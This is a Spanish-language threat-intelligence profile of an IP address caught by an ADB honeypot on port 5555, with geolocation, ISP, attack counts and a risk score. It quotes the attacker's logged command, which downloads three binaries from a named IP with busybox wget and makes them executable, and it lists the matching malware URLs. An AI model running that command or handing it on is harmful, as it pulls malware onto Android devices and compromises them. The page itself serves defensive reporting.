Amenaza ActivaBAJO

176.65.148.55

Pais de Origen🇳🇱 Paises Bajos
Primera Deteccion25/2/2026
Ultima Actividad25/2/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
3
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
0
Malware

Geolocalizacion

Pais
🇳🇱 Paises Bajos
Ciudad
Eygelshoven
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Tipos de Ataque

adbhoney

Puertos Atacados

5555

Malware Asociado

Sin malware asociado

Comandos Ejecutados

$cd /data/local/tmp/; busybox wget http://130.12.180.124/fit075kmyvo3/assets/js/55vrn6yo1m?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7w; chmod 777 55vrn6yo1m; ./55vrn6yo1m; busybox wget http://130.12.180.124/fit075kmyvo3/assets/js/gp3agts8a5?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7w; chmod 777 gp3agts8a5; ./gp3agts8a5; busybox wget http://130.12.180.124/fit075kmyvo3/assets/js/0tupj6m8h3?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7w; chmod 777 0tupj6m8h3; ./0tupj6m8h31x

URLhaus Intel2 URLsabuse.ch

Esta IP ha usado las siguientes URLs maliciosas conocidas:

http://130.12.180.124/fit075kmyvo3/assets/js/gp3agts8a5?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7w
offlinemalware_downloadelfua-wget
http://130.12.180.124/fit075kmyvo3/assets/js/0tupj6m8h3?token=jukDt3BlreIW0LfiSuS5B2ERVrpsnL7w
offlinemalware_downloadelfua-wget

Evaluacion de Riesgo

10
/100
BajoMedioAltoCritico